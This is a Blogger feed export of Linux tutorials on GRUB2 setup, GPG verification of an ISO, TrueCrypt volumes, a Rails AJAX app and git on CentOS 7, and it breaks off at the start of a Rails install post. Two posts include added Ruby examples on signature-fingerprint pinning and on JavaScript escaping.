tag:blogger.com,1999:blog-11640863232666060432024-03-29T12:33:30.417+05:30Linux & Hacking GuideThe site contains tutorials to solve various linux and hacking problems.Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.comBlogger77125tag:blogger.com,1999:blog-1164086323266606043.post-69439325402254955232017-01-19T14:56:00.002+05:302017-01-19T14:59:32.576+05:30Add entry for Windows 7 in Grub2 in CentOS7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
1) Open the following file and append the entry below.<br />
[root@block1 ~]# <b>vi /etc/grub.d/40_custom </b><br />
<br />
<br />
<b>menuentry "Microsoft Windows 7"{<br />set root='(hd0,msdos1)'<br />chainloader +1<br />}</b><br />
<br />
<br />
<br />
2) Run the following command.<br />
[root@block1 ~]# <b>cd /boot/grub2</b><br />
[root@block1 grub2]# <b>grub2-mkconfig -o grub.cfg </b><br />
<br />
<br />
<br />
3) Reboot the machine. You will now see an entry for Windows 7 in the GRUB menu.<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com15tag:blogger.com,1999:blog-1164086323266606043.post-56467868364013325722017-01-19T14:03:00.000+05:302017-01-19T14:03:19.590+05:30Install grub 2 bootloader using CentOS7 Installation DVD<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<br />
1) Boot the machine using CentOS installation DVD<br />
<br />
2) On the first screen, Select the option <span style="color: red;">Troubleshooting</span>.<br />
<br />
3) On the next screen, select the option <span style="color: red;">Rescue a CentOS system</span>.<br />
<br />
4) On the next screen, the rescue environment will attempt to find your Linux installation and mount it under /mnt/sysimage. Select the option <span style="color: red;">Continue</span>.<br />
<br />
5) You will now get a shell prompt.<br />
<br />
6) Type the following commands:<br />
<br />
<span style="color: red;">chroot /mnt/sysimage</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">grub2-install /dev/sda</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">exit</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">exit</span><br />
<br />
<br />
7) Remove the DVD and boot from the hard disk. <br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com8tag:blogger.com,1999:blog-1164086323266606043.post-14936484469905675662016-04-22T16:10:00.000+05:302016-04-22T18:24:56.049+05:30Verify the integrity of downloaded ISO files<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
You should always verify any downloaded ISO file: it may have been maliciously modified by an attacker so that it installs malware such as backdoors or keyloggers on your computer. <br />
<br />
The publisher signs the ISO file with their private key, producing a digital signature that is distributed as a separate (detached) signature file. The matching public key is used to check that signature against the ISO file.<br />
<br />
A good signature shows that the file was produced by the holder of the private key, since nobody else has it, and that the file has not been modified or tampered with in any way since it was signed. Both guarantees depend on the public key really belonging to the publisher, so its fingerprint should be compared against a source other than the download site; the gpg WARNING in step 6 below is pointing out exactly this. <br />
<br />
1) Download the ISO file.<br />
<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>wget https://github.com/Security-Onion-Solutions/security-onion/releases/download/v14.04.4.1/securityonion-14.04.4.1.iso</b></span><br />
<br />
<br />
2) Download the digital signature for the above downloaded ISO file.<br />
<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>wget https://github.com/Security-Onion-Solutions/security-onion/raw/master/securityonion-14.04.4.1.iso.sig</b></span><br />
<br />
<br />
3) Download the public key.<br />
<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>wget https://raw.githubusercontent.com/Security-Onion-Solutions/security-onion/master/KEYS</b></span><br />
<br />
4) Import the public key in your public keyring.<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>gpg --import KEYS</b></span><br />
<br />
5) View your public keyring<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>gpg2 --list-keys</b><br />/home/shabbir/.gnupg/pubring.gpg<br />--------------------------------<br />pub 4096R/ED6CF680 2012-06-29<br />uid Doug Burks <doug.burks@gmail.com><br />sub 4096R/C5D9F4EB 2012-06-29</span><br />
<br />
6) Verify the ISO file using the signature file.<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$<b> gpg --verify securityonion-14.04.4.1.iso.sig securityonion-14.04.4.1.iso</b><br /><span style="background-color: #fce5cd;"><span style="color: #444444;">gpg: Signature made Sat 19 Mar 2016 05:32:50 PM IST using RSA key ID ED6CF680<br />gpg: Good signature from "Doug Burks <doug.burks@gmail.com>"</span></span><br />gpg: WARNING: This key is not certified with a trusted signature!<br />gpg: There is no indication that the signature belongs to the owner.<br />Primary key fingerprint: BD56 2813 E345 A068 5FBB 91D3 788F 62F8 ED6C F680</span><br />
<br />
<br />
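As an added example (not part of the original post), the following Ruby script turns step 6 into a check a download script can act on: it reads gpg's machine-readable <b>--status-fd</b> output and accepts the ISO only when the VALIDSIG line carries the fingerprint printed above, so a good signature from some other key that happens to be in the keyring is rejected. The fingerprint is the one from the post; the sample status lines are constructed, and verify_iso assumes gpg is on the PATH.

```ruby
require "open3"

# Fingerprint pinned from the "Primary key fingerprint" line gpg printed in step 6.
# Hard-coding it means a good signature from any other key in the keyring is still
# rejected, which is what gpg's "not certified with a trusted signature" WARNING
# is asking you to take care of.
EXPECTED_FPR = "BD562813E345A0685FBB91D3788F62F8ED6CF680".freeze

# Classify the lines gpg emits with --status-fd. Returns
#   :valid     a VALIDSIG line names the pinned key (as signing key or primary key)
#   :wrong_key the signature is good, but was made by a different key
#   :bad       gpg reported a bad, expired, revoked or unverifiable signature
#   :none      no signature verdict appeared at all
def classify_gpg_status(status_output, expected_fpr = EXPECTED_FPR)
  result = :none
  status_output.each_line do |line|
    next unless line.start_with?("[GNUPG:] ")
    fields = line.split
    case fields[1]
    when "BADSIG", "ERRSIG", "EXPSIG", "EXPKEYSIG", "REVKEYSIG"
      return :bad
    when "VALIDSIG"
      # fields[2] is the fingerprint of the key that made the signature; when a
      # subkey signed, the last field is the primary key's fingerprint.
      fingerprints = [fields[2], fields[-1]].map(&:upcase)
      result = fingerprints.include?(expected_fpr.upcase) ? :valid : :wrong_key
    end
  end
  result
end

# The call a download script would make after steps 1 to 4; not run in this file.
# Sending the status lines to fd 1 keeps them apart from gpg's human-readable
# messages, which go to stderr.
def verify_iso(iso_path, sig_path = "#{iso_path}.sig")
  stdout, _stderr, _status = Open3.capture3("gpg", "--status-fd", "1", "--verify", sig_path, iso_path)
  classify_gpg_status(stdout)
end

# Constructed sample status output modelled on the step 6 output (timestamp made up).
SAMPLE_GOOD = <<~STATUS
  [GNUPG:] NEWSIG
  [GNUPG:] GOODSIG 788F62F8ED6CF680 Doug Burks <doug.burks@gmail.com>
  [GNUPG:] VALIDSIG BD562813E345A0685FBB91D3788F62F8ED6CF680 2016-03-19 1458388970 0 4 0 1 2 00 BD562813E345A0685FBB91D3788F62F8ED6CF680
  [GNUPG:] TRUST_UNDEFINED 0 pgp
STATUS

# Same shape, but signed by a different (constructed) key that is also in the keyring.
SAMPLE_OTHER_KEY = SAMPLE_GOOD.gsub(EXPECTED_FPR, "0" * 40)

# Tampered ISO: the signature does not match the file.
SAMPLE_BAD = "[GNUPG:] NEWSIG\n[GNUPG:] BADSIG 788F62F8ED6CF680 Doug Burks <doug.burks@gmail.com>\n"

if $PROGRAM_NAME == __FILE__
  puts classify_gpg_status(SAMPLE_GOOD)       # valid
  puts classify_gpg_status(SAMPLE_OTHER_KEY)  # wrong_key
  puts classify_gpg_status(SAMPLE_BAD)        # bad
end
```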
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com9tag:blogger.com,1999:blog-1164086323266606043.post-90950516790783659162016-04-20T23:08:00.000+05:302016-04-20T23:14:09.253+05:30Creating Encrypted volumes using Truecrypt in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
TrueCrypt is software for creating and maintaining on-the-fly encrypted volumes. On-the-fly encryption means that data is automatically encrypted just before it is saved and decrypted just after it is loaded, without user intervention.<br />
<br />
1) Open TrueCrypt<br />
root@kali:~# <b>truecrypt</b><br />
<br />
A GUI window will open. <br />
<br />
2) Click on <b>Create Volume</b>.<br />
<br />
<br />
<br />
3) Select the option <b>Create an encrypted file container</b> as shown below.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxE_yN6nlZHPIrFrK6kau-iOBjnIzdqr4jjB1ZfrII7PtnBcSYeBKnry3bn6gT7dLPh-qLmoeRzIq0CyQpKor3yrgZbNK2AaN9E1ngG1CWgULwicumGO1dtHe0vfPp_ZGV7EVDx68yRbse/s1600/01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxE_yN6nlZHPIrFrK6kau-iOBjnIzdqr4jjB1ZfrII7PtnBcSYeBKnry3bn6gT7dLPh-qLmoeRzIq0CyQpKor3yrgZbNK2AaN9E1ngG1CWgULwicumGO1dtHe0vfPp_ZGV7EVDx68yRbse/s320/01.png" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This option creates a file container whose contents are encrypted. Files of any type can be stored in it; as long as they are inside the container they are encrypted.<br />
<br />
4)Select the option <b>Standard TrueCrypt volume</b>. <br />
<br />
5) Specify the location of the container file:<br />
<b>/root/Desktop/try</b><br />
<br />
6) Select the encryption algorithm.<br />
<br />
7) Select the size of the volume you want.<br />
The free space available is displayed below the size box.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rBlalVBnTI9Ce2QZf6TZ5PkUmIeaLyHJ9bMU8U0WQ82yuqK_f_Bg7PLQTPml7ZGbxXqTVHkEK2Mo87vb-R-SY3yKI6CC_JQk8hwUmbpjAo-QovKgsqXKYVMNg3IfP2DGEzyF2qWi7IeO/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rBlalVBnTI9Ce2QZf6TZ5PkUmIeaLyHJ9bMU8U0WQ82yuqK_f_Bg7PLQTPml7ZGbxXqTVHkEK2Mo87vb-R-SY3yKI6CC_JQk8hwUmbpjAo-QovKgsqXKYVMNg3IfP2DGEzyF2qWi7IeO/s320/02.png" width="320" /></a></div>
<br />
<br />
8) Set the password for the volume.<br />
<br />
9) Select the filesystem you want on the volume.<br />
<br />
10) Select <b>I will mount the volume only on Linux</b>.<br />
<br />
11) Click on <b>Format</b>.<br />
<br />
Mount the volume to use it for creating files and directories<br />
1) Select one of the slots in the list, then select the volume file. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIXsJdE4v49TTTQadKOFdsVhsP8LQExZsEmdPriNs0CibHSccWAv6JeMaP1nsZpEEpNnvNz-eu5JjiwJDWiqCTWYwzevVu06K3uq_v4PUzEk7-M4WKaOj_qKYTNWB6xIQ2mT4K_zhlBFIN/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIXsJdE4v49TTTQadKOFdsVhsP8LQExZsEmdPriNs0CibHSccWAv6JeMaP1nsZpEEpNnvNz-eu5JjiwJDWiqCTWYwzevVu06K3uq_v4PUzEk7-M4WKaOj_qKYTNWB6xIQ2mT4K_zhlBFIN/s320/03.png" width="320" /></a></div>
<br />
<br />
2) Click on Mount to mount this volume<br />
<br />
3) Now access the volume from the terminal, or use the GUI.<br />
root@kali:~# <b>df</b><br />
Filesystem 1K-blocks Used Available Use% Mounted on<br />
rootfs 11459808 9637072 1217552 89% /<br />
udev 10240 0 10240 0% /dev<br />
tmpfs 102488 508 101980 1% /run<br />
/dev/mapper/kali-root 11459808 9637072 1217552 89% /<br />
tmpfs 5120 0 5120 0% /run/lock<br />
tmpfs 204960 84 204876 1% /run/shm<br />
/dev/sda1 233191 26050 194700 12% /boot<br />
<b>/dev/mapper/truecrypt1 30356 430 27436 2% /media/truecrypt1</b><br />
<br />
4) Change directory to /media/truecrypt1 and create files and directories<br />
root@kali:~# <b>cd /media/truecrypt1/</b><br />
root@kali:/media/truecrypt1# <b>mkdir first</b><br />
root@kali:/media/truecrypt1/first# <b>touch foo1</b><br />
<br />
5) Dismount the volume using the terminal or the GUI<br />
1) For the GUI, click on Dismount in TrueCrypt<br />
2) From the terminal, go to the root directory and unmount truecrypt1<br />
root@kali:/# <b>umount /media/truecrypt1 </b><br />
<b></b><br />
<br />
<br />
</div>
Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-1164086323266606043.post-27409943867374852502016-04-20T22:52:00.000+05:302016-04-21T11:56:54.104+05:30AJAX in Ruby On Rails: Sample Application<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">1) Create a new project, then generate the model and controller.</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron Aptana Studio 3 Workspace]$ <b>rails new ajax1</b></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron Aptana Studio 3 Workspace]$ <b>cd ajax1/</b></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron ajax1]$ <b>rails generate model Task name:string</b> </span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron ajax1]$ <b>rake db:migrate</b> </span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron ajax1]$ <b>rails generate controller tasks index </b></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">2) <span style="color: red;">routes.rb</span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> <span style="background-color: #fce5cd;"><b>resources :tasks<br /><br /> root 'tasks#index'</b></span></span></span><br />
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">3) <span style="color: red;">tasks_controller.rb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: #fff2cc;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;">class TasksController < ApplicationController<br /> def index<br /> @tasks = Task.all<br /> end<br /><br /> def new<br /> @task = Task.new<br /> end<br /><br /> def create<br /> @task= Task.new(task_params)<br /> @task.save<br /> <br /> @tasks = Task.all<br /> end <br /><br /> def edit<br /> @task = Task.find(params[:id])<br /> end<br /> <br /> def update<br /> @task = Task.find(params[:id])<br /> @task.update(task_params) <br /><br /> @tasks = Task.all<br /> end<br /><br /> def destroy<br /> @task = Task.find(params[:id])<br /> @task.destroy <br /><br /> @tasks = Task.all<br /> end<br /> <br /> private<br /> def task_params<br /> params.require(:task).permit(:name)<br /> end <br />end</span></span></span></b></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">4</span>) Views</span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "New Task" link, an AJAX request is sent to the server because <i>remote: true</i> is set.</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">index.html.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"><div><br /> <%= link_to "New Task" , new_task_path, id: "new_link", <span style="background-color: #ea9999;">remote: true</span> %><br /></div><br /><br /><div id="task_form" style="display:none"><br /></div><br /><br /><h2> List All Tasks </h2><br /><br /><div id="tasks"><br /><%= render 'list' %><br /></div></span></span></span></b><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "Edit" or "Delete" links, an AJAX request is sent to the server because <i>remote: true</i> is set.</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">_list.html.erb</span></span></span><br />
<br />
<span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><table><br /><tr><br /> <th>Name</th><th colspan="3"></th> <br /></tr> </span></span></b></span><br />
<span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><% @tasks.each do |task| %></span></span></b></span><br />
<b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"> <tr><br /> <td><%= task.name %> </td><br /> <td><%= link_to 'Edit', edit_task_path(task), <span style="background-color: #ea9999;">remote: true</span> %></td><br /> <td><%= link_to 'Delete', task, method: :delete, data: {confirm: 'Are you sure ?'}, <span style="background-color: #ea9999;">remote: true</span> %></td><br /> <br /> </tr><br /><% end %><br /></table></span></span></span></b><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user submits the form, an AJAX request is sent to the server because <i>remote: true</i> is set.</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">_form.html.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><b><span style="background-color: #fce5cd;"><%= form_for @task, <span style="background-color: #ea9999;">remote: true</span> do |f| %><br /><br /><%= f.label :name %><br /><%= f.text_field :name %><br /><br /><%= f.submit "Save" %><br /><% end %></span></b></span></span><br />
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">5</span>) Javascript</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "New Task" link, the form is displayed and the "New Task" link is hidden. </span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"> </span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">new.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"><span style="color: #fce5cd;"><b><span style="color: #444444;">$("#new_link").hide();<br /><br />$("#task_form").html("<%= j (render 'form') %>");<br /><br />$("#task_form").slideDown();</span></b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><span style="color: #444444;">After the task is created, the "New Task" link is displayed, the form is hidden and the list of tasks is updated.</span></span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">create.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;">$("#new_link").show();<br /><br />$("#task_form").slideUp();<br /><br />$("#tasks").html("<%= j (render('list')) %>" );</span></span></span></b><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "<span style="font-family: "arial" , "helvetica" , sans-serif;">Edit</span>" link, the form is displayed and the "New Task" link is hidden. </span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><br /></span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">edit.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"><b>$("#new_link").hide();<br /><br />$("#task_form").html("<%= j (render 'form') %>");<br /><br />$("#task_form").slideDown();</b></span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><span style="color: #444444;">After the task is updated, the "New Task" link is displayed, the form is hidden and the list of tasks is updated.</span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">update.js.erb</span></span></span><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">$("#new_link").show();<br /><br />$("#task_form").slideUp();<br /><br />$("#tasks").html("<%= j (render('list')) %>" );</span></span></b></span><br />
<br />
<br />
When the user clicks on the "Delete" link, the task is destroyed and the list of tasks is updated.<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">destroy.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span><span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">$("#tasks").html("<%= j (render('list')) %>" ); </span></span></b></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
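Every js.erb above wraps the rendered partial in <b>j</b> (escape_javascript) before dropping it into a JavaScript string. The following plain-Ruby example, added here and not part of the original post, shows why that matters: it uses a minimal reimplementation of the helper (not the Rails source) and a stand-in for rendering _list.html.erb, then checks whether the resulting $("#tasks").html("...") statement is still one well-formed string literal with and without the escaping.

```ruby
require "erb"

# Minimal reimplementation, written for this example, of what Rails' escape_javascript
# (the j helper used in new/create/edit/update/destroy.js.erb above) does: it makes a
# string safe to place inside a JavaScript string literal. This is not the Rails source.
JS_ESCAPE_MAP = {
  "\\"   => "\\\\",
  "</"   => '<\/',   # keeps a "</script>" in the payload from closing an inline <script>
  "\r\n" => '\n',
  "\n"   => '\n',
  "\r"   => '\n',
  '"'    => '\"',
  "'"    => "\\'",
}.freeze

def escape_javascript(text)
  text.to_s.gsub(/(\\|<\/|\r\n|[\n\r"'])/, JS_ESCAPE_MAP)
end

# Stand-in for rendering _list.html.erb: the header row plus one row per task.
# ERB::Util.html_escape plays the part of <%= task.name %>, which HTML-escapes the name.
def render_list(task_names)
  rows = task_names.map { |name| "  <tr>\n    <td>#{ERB::Util.html_escape(name)}</td>\n  </tr>\n" }
  "<table>\n  <tr>\n    <th>Name</th><th colspan=\"3\"></th>\n  </tr>\n#{rows.join}</table>\n"
end

# The statement create/update/destroy.js.erb send back to the browser:
#   $("#tasks").html("<%= j(render('list')) %>");
# escape: false interpolates the partial raw, as if j had been left out.
def tasks_js_response(task_names, escape: true)
  html = render_list(task_names)
  payload = escape ? escape_javascript(html) : html
  %Q{$("#tasks").html("#{payload}");}
end

# True when the response is exactly one jQuery call whose argument is a single
# well-formed JavaScript string literal: no raw double quote or line break inside
# it, and every backslash starting an escape. Anything else is a syntax error in
# the browser or, worse, text from the partial being parsed as code.
def single_string_literal?(js)
  js.match?(/\A\$\("#tasks"\)\.html\("(?:[^"\\\r\n]|\\.)*"\);\z/)
end

if $PROGRAM_NAME == __FILE__
  names = ["Buy milk", "Pay \"rent\"\nby Friday"]
  puts single_string_literal?(tasks_js_response(names))                 # true
  puts single_string_literal?(tasks_js_response(names, escape: false))  # false
end
```

Even with only the template's own quotes and newlines (no hostile input at all), the unescaped version fails the check, which is why the helper is not optional in a js.erb response.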
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com4tag:blogger.com,1999:blog-1164086323266606043.post-20098361577628139982015-11-03T10:59:00.002+05:302015-11-03T11:01:06.255+05:30Version Control using git in CentOS7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Version control systems allow you to keep track of your software at
the source level. You can track changes, revert to previous stages, and
branch off from the base code to create alternative versions of files
and directories.
<br />
One of the most popular version control systems is <code>git</code>.
Many projects maintain their files in a Git repository, and sites like
GitHub and Bitbucket have made sharing and contributing to code with Git
easier than ever.<br />
In this guide, we will demonstrate how to install Git on a CentOS 7 server.<br />
<br />
1) Install git.<br />
<br />
[shabbir@compute1 ~]$ <b>sudo yum install git</b><br />
<br />
<br />
2) Configure your name and email.<br />
<br />
[shabbir@compute1 ~]$ <b>git config --global user.name "shabbir rangwala"</b><br />
[shabbir@compute1 ~]$ <b>git config --global user.email "shabbir.ahr@gmail.com"</b> <br />
<br />
[shabbir@compute1 ~]$ <b>git config --list</b><br />
user.name=shabbir rangwala<br />
user.email=shabbir.ahr@gmail.com<br />
<br />
<br />
3) Create your workspace. Create a directory '<i>git</i>' in your home directory, with a subdirectory for each of your individual projects. <br />
<br />
[shabbir@compute1 ~]$ <b>mkdir -p ~/git/perl</b><br />
[shabbir@compute1 ~]$ <b>cd ~/git/perl</b><br />
<br />
<br />
4) Copy all project files into the directory. Here we create a test file to use in our repository.<br />
<br />
[shabbir@compute1 perl]$ <b>touch test_file.pl</b><br />
<br />
<br />
5) Tell git that you want to use the current directory as a git repository.<br />
<br />
[shabbir@compute1 perl]$ <b>git init</b><br />
Initialized empty Git repository in /home/shabbir/git/perl/.git/<br />
<br />
<br />
6) Add all files and directories to your newly created repository. <br />
<br />
[shabbir@compute1 perl]$ <b>git add .</b><br />
<br />
<br />
7) Every time you add or change files, you need to commit them with a commit message. Commit messages explain what your change did.<br />
<br />
[shabbir@compute1 perl]$ <b>git commit -m "Initial Commit" -a</b><br />
<br />
The -a flag tells git to include all modified (already tracked) files in the commit. This is fine for the first commit, but generally you should specify the individual files or directories that you want to commit. <br />
<br />
To commit an individual file: <br />
[shabbir@compute1 perl]$ <b>git commit -m "Initial Commit" test_file.pl</b><br />
<br />
To include more files or directories, append a space-separated list of them to the end of that command. <br />
<br />
8) Create an account on github.com and create a repository 'perl' <br />
<br />
<br />
9) Configure the remote repository. The name is 'origin' and the URL is 'https://github.com/RShabbir53/perl.git'.<br />
<br />
[shabbir@compute1 perl]$ <b>git remote add origin https://github.com/RShabbir53/perl.git</b><br />
<br />
[shabbir@compute1 perl]$ <b>git remote -v</b><br />
origin https://github.com/RShabbir53/perl.git (fetch)<br />
origin https://github.com/RShabbir53/perl.git (push)<br />
<br />
<br />
<br />
10) Push the code to the remote server. "git push" tells git that we want to push our changes, "origin" is the name of the newly configured remote and "master" is the name of the first branch. The -u flag records origin/master as the upstream of your local branch.<br />
<br />
[shabbir@compute1 perl]$ <b>git push -u origin master</b><br />
<br />
<br />
11) In the future, when you have commits that you want to push to the server, you can simply type "git push".<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-2106560221907150842015-11-01T21:58:00.001+05:302016-04-20T23:12:10.446+05:30Install Ruby on Rails in CentOS7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
1) Install prerequisites.<br />
<br />
<div class="result notranslate" style="text-align: left;">
